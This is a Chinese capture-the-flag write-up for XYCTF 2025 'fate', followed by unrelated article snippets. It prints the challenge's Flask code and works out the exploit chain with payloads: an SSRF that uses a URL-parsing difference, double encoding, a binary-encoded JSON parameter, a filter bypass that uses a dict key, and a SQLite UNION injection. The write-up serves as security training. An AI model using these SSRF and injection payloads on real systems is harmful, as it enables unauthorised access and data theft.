当前位置: 首页 > news >正文

利用解析差异SSRF + sqlite注入 + waf逻辑漏洞 -- xyctf 2025 fate WP

news 来源:原创 2025/8/25 3:23:45

本文章附带TP(Thinking Process)!

#!/usr/bin/env python3
# 导入所需的库
import flask  # Flask web框架
import sqlite3  # SQLite数据库操作
import requests  # HTTP请求库
import string  # 字符串处理
import json  # JSON处理app = flask.Flask(__name__)  # 创建Flask应用实例
blacklist = string.ascii_letters  # 所有英文字母(大小写)作为黑名单# 将二进制字符串转换为普通字符串
def binary_to_string(binary_string):if len(binary_string) % 8 != 0:raise ValueError("Binary string length must be a multiple of 8")# 将二进制字符串按每8位分割binary_chunks = [binary_string[i:i + 8] for i in range(0, len(binary_string), 8)]# 将每8位二进制转换为对应的字符string_output = ''.join(chr(int(chunk, 2)) for chunk in binary_chunks)return string_output# 代理路由,用于转发请求
@app.route('/proxy', methods=['GET'])
def nolettersproxy():url = flask.request.args.get('url')  # 获取请求参数中的urlif not url:return flask.abort(400, 'No URL provided')  # 如果没有提供url,返回400错误target_url = "http://lamentxu.top" + url  # 构造目标URL# 检查url中是否包含黑名单中的字母for i in blacklist:if i in url:return flask.abort(403, 'I blacklist the whole alphabet, hiahiahiahiahiahiahia~~~~~~')# 防止SSRF攻击,不允许包含点号if "." in url:return flask.abort(403, 'No ssrf allowed')# 发送请求到目标URLresponse = requests.get(target_url)return flask.Response(response.content, response.status_code)# 数据库查询函数
def db_search(code):with sqlite3.connect('database.db') as conn:  # 连接SQLite数据库cur = conn.cursor()# 执行SQL查询,对输入进行多次UPPER转换(可能是为了防御某些攻击)cur.execute(f"SELECT FATE FROM FATETABLE WHERE NAME=UPPER(UPPER(UPPER(UPPER(UPPER(UPPER(UPPER('{code}'))))))")found = cur.fetchone()  # 获取查询结果return None if found is None else found[0]  # 返回结果或None# 首页路由
@app.route('/')
def index():print(flask.request.remote_addr)  # 打印访问者的IP地址return flask.render_template("index.html")  # 渲染并返回index.html模板# 1337路由,提供API搜索功能
@app.route('/1337', methods=['GET'])
def api_search():# 只允许本地访问if flask.request.remote_addr == '127.0.0.1':code = flask.request.args.get('0')  # 获取参数0if code == 'abcdefghi':  # 检查参数0是否为特定值req = flask.request.args.get('1')  # 获取参数1try:# 将二进制字符串转换为普通字符串req = binary_to_string(req)print(req)# 解析JSON(注释中提到认为JSON比Pickle更安全)req = json.loads(req)except:flask.abort(400, "Invalid JSON")  # JSON解析失败返回400# 检查JSON中是否包含name字段if 'name' not in req:flask.abort(400, "Empty Person's name")name = req['name']# 检查name长度if len(name) > 6:flask.abort(400, "Too long")# 防止SQL注入,检查特殊字符if '\'' in name:flask.abort(400, "NO '")if ')' in name:flask.abort(400, "NO )")"""Some waf hidden here ;)这里有隐藏的WAF(Web应用防火墙)规则"""# 查询数据库fate = db_search(name)if fate is None:flask.abort(404, "No such Person")  # 未找到记录返回404return {'Fate': fate}  # 返回查询结果else:flask.abort(400, "Hello local, and hello hacker")  # 参数0不正确返回400else:flask.abort(403, "Only local access allowed")  # 非本地访问返回403if __name__ == '__main__':app.run(debug=True)  # 启动Flask应用,开启调试模式

看起来,我们的第一步是尝试造成ssrf,访问查询api

@app.route('/proxy', methods=['GET'])
def nolettersproxy():url = flask.request.args.get('url')  # 获取请求参数中的urlif not url:return flask.abort(400, 'No URL provided')  # 如果没有提供url,返回400错误target_url = "http://lamentxu.top" + url  # 构造目标URL# 检查url中是否包含字母for i in blacklist:if i in url:return flask.abort(403, 'I blacklist the whole alphabet, hiahiahiahiahiahiahia~~~~~~')# 防止SSRF攻击,不允许包含点号if "." in url:return flask.abort(403, 'No ssrf allowed')# 发送请求到目标URLresponse = requests.get(target_url)return flask.Response(response.content, response.status_code)

题目没有禁止符号,翻看利用手册尝试利用解析差异访问

 &@0:8080

/proxy?url=%20%26%400%3A8080

成功

/proxy?url=%20%26%400%3A8080

继续传递参数,我们使用双重url编码

 &@0:8080/1337?0=%61%62%63%64%65%66%67%68%69

/proxy?url=%20%26%400%3A8080%2F1337%3F0%3D%2561%2562%2563%2564%2565%2566%2567%2568%2569

按照代码逆向编写编码器

def string_to_binary(input_str):"""将普通字符串转换为8位二进制组成的字符串"""binary_str = []for char in input_str:# 获取字符的ASCII码并转换为二进制,补齐8位前导零binary_char = bin(ord(char))[2:].zfill(8)  # [2:]去除0b前缀binary_str.append(binary_char)return ''.join(binary_str)a = "/proxy?url=%20%26%400%3A8080%2F1337%3F0%3D%2561%2562%2563%2564%2565%2566%2567%2568%2569%261%3D"
print(a + string_to_binary('{"name":"test"}'))

/proxy?url=%20%26%400%3A8080%2F1337%3F0%3D%2561%2562%2563%2564%2565%2566%2567%2568%2569%261%3D011110110010001001101110011000010110110101100101001000100011101000100010011101000110010101110011011101000010001001111101

我们现在需要绕过if len(name) > 6:

我们可以试试使用数组,灵感来自于我刚打完的 Cyber Apocalypse CTF 2025

len(['a'])

的输出是1,而且使用数组可以绕过剩下的waf

if '\'' in name: 只有在 ['\'] 时候才成立

但是这会造成一个意外的冒号

{"name":["\'))))))--"]}

SELECT FATE FROM FATETABLE WHERE NAME=UPPER(UPPER(UPPER(UPPER(UPPER(UPPER(UPPER('["'))))))--"]'))))))

或者我也可以尝试字典

{"name":{"test":"test"}}

SELECT FATE FROM FATETABLE WHERE NAME=UPPER(UPPER(UPPER(UPPER(UPPER(UPPER(UPPER('{'test': 'test'}'))))))

显然字典更合适,我应该使用union注入继续

import sqlite3conn = sqlite3.connect("database.db")
conn.execute("""CREATE TABLE FATETABLE (NAME TEXT NOT NULL,FATE TEXT NOT NULL
);""")
Fate = [('JOHN', '1994-2030 Dead in a car accident'),('JANE', '1990-2025 Lost in a fire'),('SARAH', '1982-2017 Fired by a government official'),('DANIEL', '1978-2013 Murdered by a police officer'),('LUKE', '1974-2010 Assassinated by a military officer'),('KAREN', '1970-2006 Fallen from a cliff'),('BRIAN', '1966-2002 Drowned in a river'),('ANNA', '1962-1998 Killed by a bomb'),('JACOB', '1954-1990 Lost in a plane crash'),('LAMENTXU', r'2024 Send you a flag flag{FAKE}')
]
conn.executemany("INSERT INTO FATETABLE VALUES (?, ?)", Fate)conn.commit()
conn.close()
SELECT FATE FROM FATETABLE WHERE NAME=UPPER(UPPER(UPPER(UPPER(UPPER(UPPER(UPPER('{'))))))) UNION SELECT FATE FROM FATETABLE--': ''}'))))))

{"name":{"))))))) UNION SELECT FATE FROM FATETABLE--":""}}

只返回了一个结果,我们需要拼接结果

{"name":{"))))))) UNION SELECT group_concat(FATE) FROM FATETABLE--":""}}

成功获得flag

相关文章:

利用解析差异SSRF + sqlite注入 + waf逻辑漏洞 -- xyctf 2025 fate WP

本文章附带TP(Thinking Process)! #!/usr/bin/env python3 # 导入所需的库 import flask # Flask web框架 import sqlite3 # SQLite数据库操作 import requests # HTTP请求库 import string # 字符串处理 import json # JSON处理app flask.Flask(__name__) # 创建Flask应…...

编程日记 2025/8/25 3:23:45

VScode无法激活conda虚拟环境,不显示虚拟环境名称

在VScode中终端中激活环境时出现下面的情况 PS F:\Model\stMMR-main> conda activate env_mamba usage: conda-script.py [-h] [--no-plugins] [-V] COMMAND ... conda-script.py: error: argument COMMAND: invalid choice: activate (choose from clean, compare, config…...

编程日记 2025/8/25 3:22:39

vscode Colipot 编程助手

1、登录到colipot,以github账号,关联登录 点击【continue】按钮,继续。 点击【打开Visual Studio Code】,回到vscode中。 2、问一下11? 可以看出,很聪明,一下子就算出来了。 3、帮我们写一个文件&#xf…...

编程日记 2025/8/25 3:19:41

vscode中REST Client插件

最近发现vscode中REST Client插件也可以测试接口 简介 在 VS Code 中,REST Client 是一个非常受欢迎的插件,用于测试和调试 RESTful API。以下是关于该插件的安装、使用和功能的详细介绍: 安装 REST Client 插件 打开 VS Code。点击左侧的扩…...

编程日记 2025/8/25 3:22:54

路由器工作在OSI模型的哪一层?

路由器主要工作在OSI模型的第三层,即网络层。网络层的主要功能是将数据包从源地址路由到目标地址,路由器通过检查数据包中的目标IP地址,并根据路由表确定最佳路径来实现这一功能。 路由器的主要功能: a、路由决策:路…...

编程日记 2025/8/21 22:19:15

(PROFINET 转 EtherCAT)EtherCAT/Ethernet/IP/Profinet/ModbusTCP协议互转工业串口网关

型号 协议转换通信网关 PROFINET 转 EtherCAT MS-GW31 概述 MS-GW31 是 PROFINET 和 EtherCAT 协议转换网关,为用户提供两种不同通讯协议的 PLC 进行数据交互的解决方案,可以轻松容易将 EtherCAT 网络接入 PROFINET 网络中,方便扩展&…...

编程日记 2025/8/19 7:20:43

【教程】MacBook 安装 VSCode 并连接远程服务器

目录 需求步骤问题处理 需求 在 Mac 上安装 VSCode,并连接跳板机和服务器。 步骤 Step1:从VSCode官网(https://code.visualstudio.com/download)下载安装包: Step2:下载完成之后,直接双击就能…...

编程日记 2025/8/25 3:20:36

Solidity基础入门—web3

Remix介绍 官网地址 Remix 是一个基于浏览器的 Solidity 开发环境,主要用于编写、测试、调试和部署以太坊智能合约。 Solidity基本数据类型 类型说明示例uint / int无符号 / 有符号整数uint256, int8, int256bool布尔类型(true / false)bo…...

编程日记 2025/8/22 7:02:19

微信小程序 request 流式数据处理

什么是流式数据处理? 流式数据处理(Streaming Data)指逐步接收并处理数据片段的技术,无需等待全部数据加载完成。适用于大文件下载、实时日志、AI生成报告等场景,可显著降低内存占用并提升用户体验。 微信小程序中的…...

编程日记 2025/8/25 3:20:35

Kotlin与HttpClient编写视频爬虫

想用Apache HttpClient库和Kotlin语言写一个视频爬虫。首先,我需要确定用户的具体需求。视频爬虫通常涉及发送HTTP请求,解析网页内容,提取视频链接,然后下载视频。可能需要处理不同的网站结构,甚至可能需要处理动态加载…...

编程日记 2025/8/17 22:13:43

数据结构:通俗解释AOE 网中事件的最早发生时间和最迟发生时间

1. 事件的最早发生时间 在 AOE 网(Activity On Edge Network,边表示活动的网络)中,事件的最早发生时间指从源点(起点)到该事件结点的最长路径长度(即所需时间)。它决定了所有以该事…...

编程日记 2025/8/19 5:04:27

爬虫中遇到的问题

网页假请求导致的阻塞 可以在requests请求当中添加timeout参数,来让网站重新请求 在爬虫请求中,timeout参数的主要作用是控制请求的最大等待时间,避免因服务器响应缓慢或网络问题导致程序长时间阻塞,从而提升爬虫的效率和稳定性…...

编程日记 2025/8/21 1:37:55

聊一聊没有接口文档时如何开展测试

目录 一、前期准备与信息收集 二、使用抓包工具分析接口 三、逆向工程构造测试用例 四、安全测试 五、 模糊测试(Fuzz Testing) 六、记录并维护发现的接口信息 七、 推动团队规范流程 其它注意事项 在我们进行接口测试时,总会遇到各种…...

编程日记 2025/8/25 3:20:35

第一部分:MCP协议与多智能体系统基础-第1课:MCP服务协议核心架构解析

以下是为《MCP服务协议核心架构解析》设计的课件内容,采用“概念解析→代码实践→运行验证”三段式教学结构,结合可视化图表与可运行代码示例,增强学生对MCP协议核心组件的理解与实操能力: 一、课程导入:MCP协议定位与…...

编程日记 2025/8/25 3:22:53

WEB安全--内网渗透--捕获NET-NTLMv2 Hash

一、前言 在LM&NTLM基础篇中我们了解到了NTLM协议的流程与加密的方式,以及具体的在type3的response中Net-ntlm hash v2的生成方式。 思考: 如果我们入侵的服务器中有域管理员的登录后的密码缓存,那就能用工具(mimikatz&…...

编程日记 2025/8/25 3:22:20

使用 J-Flash 读取芯片 Flash 数据的方法

基本读取步骤 硬件连接 确保 J-Link 调试器正确连接到目标板 给目标板供电(可通过 J-Link 供电或外部电源) 创建/打开项目 启动 J-Flash 软件 选择 "File" > "New Project" 创建新项目 选择正确的目标芯片型号(或…...

编程日记 2025/8/25 3:20:36

Spring MVC 返回 JSON 视图的方式及对比(6种)

Spring MVC 返回 JSON 视图的方式及对比(新增 MappingJackson2JsonView) 1. 方式一:ResponseBody 注解 作用:直接返回对象,由消息转换器(如 Jackson)序列化为 JSON。 适用场景:简单…...

编程日记 2025/8/24 11:59:27

SpringMVC的数据响应

1)页面跳转 直接返回字符串 通过ModelAndView对象返回 //方式三(model和view拆开)RequestMapping("/quick4")public String save4(Model model){model.addAttribute("username","lisi3");return "success";}//方式二RequestMapping(&…...

编程日记 2025/8/20 13:00:25

GraphRAG与知识图谱

一、GraphRAG介绍 1.1 什么是 Graph RAG? Graph RAG(Retrieval-Augmented Generation),是一种基于知识图谱的检索增强技术, 通过构建图模型的知识表达,将实体和关系之间的联系用图的形式进行展示&#xff…...

编程日记 2025/8/22 7:34:24

hive通过元数据库删除分区操作步骤

删除分区失败: alter table proj_60_finance.dwd_fm_ma_kpi_di_mm drop partition(year2025,month0-3,typeADJ); 1、查询分区的DB_ID、TBL_ID – 获取数据库ID-26110 SELECT DB_ID FROM DBS WHERE NAME ‘proj_60_finance’; – 获取表ID-307194 SELECT TBL_ID FR…...

编程日记 2025/8/22 8:00:34

LINUX 5 cat du head tail wc 计算机拓扑结构 计算机网络 服务器 计算机硬件

计算机网络 计算机拓扑结构 计算机按性能指标分:巨型机、大型机、小型机、微型机。大型机、小型机安全稳定,小型机用于邮件服务器 Unix系统。按用途分:专用机、通用机 计算机网络:局域网‘、广域网 通信协议’ 计算机终端、客户端…...

编程日记 2025/8/22 11:36:37

flink 增量快照同步文件引用关系和恢复分析

文章目录 文件引用分析相关代码分析从state 恢复,以rocksdb为例不修改并行度修改并行度keyGroupRange过程问题 文件引用分析 每次生成的checkpoint 里都会有所有文件的引用信息 问题,引用分析里如何把f1,f2去掉了,可以参考下面的代码&#…...

编程日记 2025/8/23 8:14:58

属性修改器 (AttributeModifier)

主页面设置组件 import { MyButtonModifier } from ../datastore/MyButtonModifier;Entry ComponentV2 struct MainPage {// 支持用状态装饰器修饰,行为和普通的对象一致Local modifier: MyButtonModifier new MyButtonModifier();build() {Column() {Button(&quo…...

编程日记 2025/8/23 11:19:43

汽车BMS技术分享及其HIL测试方案

一、BMS技术简介 在全球碳中和目标的战略驱动下,新能源汽车产业正以指数级速度重塑交通出行格局。动力电池作为电动汽车的"心脏",其性能与安全性不仅直接决定了车辆的续航里程、使用寿命等关键指标,更深刻影响着消费者对电动汽车的…...

编程日记 2025/8/21 21:10:41

电网电能质量分析:原理、算法及实际应用

一、引言 在现代社会,电力供应的稳定性和可靠性对工业生产、社会生活的各个方面都至关重要。电能质量作为衡量电力系统供电能力的关键指标,其优劣直接影响到电力设备的运行效率、使用寿命以及生产过程的稳定性。随着电力系统规模的不断扩大,新…...

编程日记 2025/8/22 22:49:24

PyCharm Community社区版链接WSL虚拟环境

#记录工作 在过去,PyCharm Community Edition(社区版)不具备链接 WSL 虚拟环境的功能,该功能仅在 PyCharm Professional(专业版)和企业版中提供。如今,从 PyCharm Community Edition 2024.3.5 …...

编程日记 2025/8/22 20:17:52

2026考研数学张宇武忠祥复习视频课,高数基础班+讲义PDF

2026考研数学武忠祥老师课(网盘):点击下方链接 2026考研数学武忠祥网课(最新网盘) 一、基础阶段(3-5个月) 目标:搭建知识框架掌握基础题型 教材使用: 高数:…...

编程日记 2025/8/21 2:41:25

Spring Boot嵌入前端静态资源:从原理到实战的完整指南

在Java Spring Boot项目中集成前端静态资源是构建现代Web应用的必备技能。本文将深入解析Spring Boot的静态资源处理机制,通过实战案例演示完整的集成流程,并分享性能优化与安全加固的最佳实践。 一、Spring Boot静态资源处理原理 1.1 默认资源路径 S…...

编程日记 2025/8/23 18:38:06

DeepSeek对比ChatGPT有何改进,可以用更低成本计算

下面是基于DeepSeek公开论文和代码,与ChatGPT对比后总结的改进点,以及其为何能用更少算力训练大模型的解析。 https://arxiv.org/pdf/2412.19437 1. 改进点对比 1.1 架构稀疏化与混合专家(MoE)设计 DeepSeek采用稀疏激活与混合…...

编程日记 2025/8/21 16:40:42

JavaScript双问号操作符(??)详解,解决使用 || 时因类型转换带来的问题

目录 JavaScript双问号操作符(??)详解,解决使用||时因类型转换带来的问题 一、双问号操作符??的基础用法 1、传统方式的痛点 2、双问号操作符??的精确判断 3、双问号操作符??与逻辑或操作符||的对比 二、复杂场景下的空值处理 …...

编程日记 2025/8/17 22:13:50

Go语言从零构建SQL数据库(5)-Pratt解析算法:SQL表达式解析的核心引擎

Pratt解析算法:SQL表达式解析的核心引擎 1. 算法概述与工作原理 Pratt解析算法(自顶向下运算符优先级解析)是一种优雅的表达式解析方法,特别适合处理具有不同优先级运算符的复杂表达式。在我们的SQL解析器中,它负责解…...

编程日记 2025/8/22 10:38:26

数字政府与电子政务综合分析报告

数字政府与电子政务综合分析报告 一、引言 随着信息技术的飞速发展,数字政府和电子政务成为全球公共管理领域的重要趋势。数字政府和电子政务的建设不仅是提升政府治理能力的必然选择,也是推动国家治理现代化的重要途径。本文将对数字政府和电子政务进…...

编程日记 2025/8/21 21:28:57

服务器虚拟化技术深度解析:医药流通行业IT架构优化指南

一、服务器虚拟化的定义与原理 (一)技术定义:从物理到虚拟的资源重构 服务器虚拟化是通过软件层(Hypervisor)将物理服务器的CPU、内存、存储、网络等硬件资源抽象为逻辑资源池,分割成多个相互隔离的虚拟机…...

编程日记 2025/8/23 13:07:14

QT ARM 开发环境搭建

搭建 QT ARM 开发环境主要包括主机环境配置、交叉编译工具链安装、QT 库交叉编译和 QT Creator 配置几个步骤。以下是详细流程: 一. 主机环境准备 系统要求 推荐 Ubuntu 18.04/20.04 LTS 或更高版本 至少 50GB 可用磁盘空间 8GB 以上内存 安装基础依赖 sudo apt update sud…...

编程日记 2025/8/21 11:27:57

【设计模式】外观模式

简介 想象你要在家里看电影,需要做以下操作: 打开电视启动音响调暗灯光关闭窗帘 如果每次都要手动操作这些步骤会很麻烦。外观模式可以帮你将这些步骤封装成一个统一的接口,比如“一键观影模式”,你只需按一个按钮,…...

编程日记 2025/8/23 5:09:19

[特殊字符] 驱动开发硬核特训 · Day 5 - 深入解析 Platform Driver 驱动框架

主题:深入解析 Platform Driver 驱动框架 —— 从架构设计到工程实战 平台驱动(platform driver)是 Linux 内核中应用最广泛的一种设备驱动框架。它用于管理那些不依赖总线枚举机制的固定外设,如 GPIO 控制器、I2C 控制器、SPI 控…...

编程日记 2025/8/21 1:56:18

创意 Python 爱心代码

在编程的世界里,Python 以其简洁易用和丰富的库而备受喜爱。用 Python 编写爱心代码,不仅能展现编程的魅力,还能传递温暖与爱意。今天就来分享几种创意 Python 爱心代码。 一、基于turtle库绘制爱心 turtle库是 Python 内置的图形库&#x…...

编程日记 2025/8/25 0:33:29

【群晖】挂载小雅alist到AList网盘中

群晖开启远程 在命令行远程到主机 ssh 用户名主机名终端中执行下方命令创建一个在AList中挂载小雅所需要的token&#xff1a; docker exec -i xiaoya sqlite3 data/data.db <<EOF select value from x_setting_items where key "token"; EOF 如果报权限错误…...

编程日记 2025/8/23 1:51:41

嵌入式C语言11(宏/程序的编译过程)

宏 ⦁ 基本概念 C语言中可以利用宏定义实现文本的快速替换&#xff0c;注意&#xff1a;宏定义是单纯的文本替换&#xff0c;不检查语法是否合法。 C语言标准中提供了很多的预处理指令&#xff0c;比如#include、#pragma…以#开头的都属于预处理指令。 预处理指令指的是在…...

编程日记 2025/8/22 7:57:33

城电科技 | 太阳能花怎么选择?光伏太阳花的应用场景在哪里?

在当下追求绿色能源的时代&#xff0c;珠海城电科技的太阳能花逐渐走进人们的视野。那么&#xff0c;太阳能花究竟是什么呢&#xff1f;太阳能花属于光伏发电应用的一种&#xff0c;巧妙地利用太阳能进行发电。它还有着光伏太阳花、光伏发电花、光伏智慧花等别称。 城电科技-光…...

编程日记 2025/8/23 15:22:20

[C++面试] C++中各类括号的差异:[]、{}、<>、()

括号类型典型场景编译期/运行时安全性考量()函数调用、运算优先级两者注意强制转换风险[]数组访问、Lambda捕获运行时主导防止越界访问{}统一初始化、聚合类型编译期检查阻止隐式窄化转换<>模板实例化、元编程编译期注意模板展开爆炸问题 int x{5}; int x(5);有什么区别…...

编程日记 2025/8/22 13:34:25

Qt 入门 3 之对话框 QDialog(1)

Qt 入门 3 之对话框 QDialog 本文从以下几点分开讲述&#xff1a; - 对话框的基本原理介绍 - 两种不同类型的对话框 - 一个由多个窗口组成并且窗口间可以相互切换的程序 1.模态和非模态对话框 QDialog 类是所有对话框窗口类的基类。对话框窗口是一个经常用来完成短小任务或者…...

编程日记 2025/8/21 21:30:51

Python设计模式:组合模式

1. 什么是组合模式 组合模式&#xff08;Composite Pattern&#xff09;是一种结构型设计模式&#xff0c;它允许将对象组合成树形结构以表示“部分-整体”的层次关系。组合模式使得客户端对单个对象和组合对象的使用具有一致性。换句话说&#xff0c;组合模式可以让客户端以相…...

编程日记 2025/8/21 19:09:26

第九天 - psutil系统监控库 - 资源监控仪表盘 - 练习:实时CPU/Memory监控

使用Python打造实时资源监控仪表盘&#xff08;psutilFastAPI&#xff09; 一、为什么要学习系统监控&#xff1f; 在软件开发中&#xff0c;系统资源监控是每个开发者都需要掌握的重要技能。无论是排查性能瓶颈、优化程序效率&#xff0c;还是确保服务稳定性&#xff0c;实时…...

编程日记 2025/8/17 22:14:14

Spring Boot内嵌服务器全解析:Tomcat vs Jetty vs Undertow 选型指南

精心整理了最新的面试资料和简历模板&#xff0c;有需要的可以自行获取 点击前往百度网盘获取 点击前往夸克网盘获取 引言 在Spring Boot应用中&#xff0c;内嵌服务器的选择直接影响应用的性能、资源占用和扩展性。尽管Tomcat作为默认选项被广泛使用&#xff0c;Jetty和Unde…...

编程日记 2025/8/22 14:02:49

【嵌入式学习6】多任务版TCP服务器

目录 如何实现&#xff1a; 客户端1.0版本&#xff1a; 服务端&#xff1a; 客户端2.0版本&#xff1a; thread.join() 是一个线程同步方法&#xff0c;用于主线程等待子线程完成。当你调用 thread.join() 时&#xff0c;主线程会阻塞&#xff0c;直到调用 join() 的子线程…...

编程日记 2025/8/21 14:15:55

抖音直播位置与IP属地不同?如何实现

抖音作为头部平台吸引了大量主播和观众。然而&#xff0c;许多用户发现一个令人困惑的现象&#xff1a;直播间显示的位置信息与账号IP属地不一致。本文将深入分析这一现象背后的原因&#xff0c;探讨可能带来的影响&#xff0c;并提供实用的解决方案。 一、抖音直播显示的位置与…...

编程日记 2025/8/24 1:20:11

Scala(六)

本节课学习了数组、列表、Set集合、Map集合、元组、集合中常用的函数等等。 数组包括可变数组、不可变数组&#xff0c;学习了如何定义和创建数组、可变数组和不可变数组之间的转换、多维数组、数组遍历 列表学习了如何添加元素、合并集合、如何访问元素、遍历列表 Set集合学…...

编程日记 2025/8/23 4:38:45

Android 11.0 framework系统首次开机添加锁屏壁纸的功能

1.前言 在11.0的系统rom定制化开发中,在某些时候需要默认设置锁屏壁纸功能,而系统中没有在 framework/base下没有单独的默认锁屏壁纸的图片替换,默认就是锁屏壁纸和主屏幕壁纸 都是同一张壁纸,所以就需要添加接口来实现设置默认锁屏壁纸的功能 2.framework系统首次开机添…...

编程日记 2025/8/20 8:21:45

Scala数组

数组 - 可变数组&#xff1a;以 ArrayBuffer 创建&#xff0c;可灵活增删改元素 &#xff0c;如 ArrayBuffer(1, 2, 3) &#xff0c;并通过 append 等方法操作。 - 不可变数组&#xff1a;由 Array 构建&#xff0c;创建后元素不可变&#xff0c;可借助 toBuffer 等方法转换为…...

编程日记 2025/8/24 14:32:13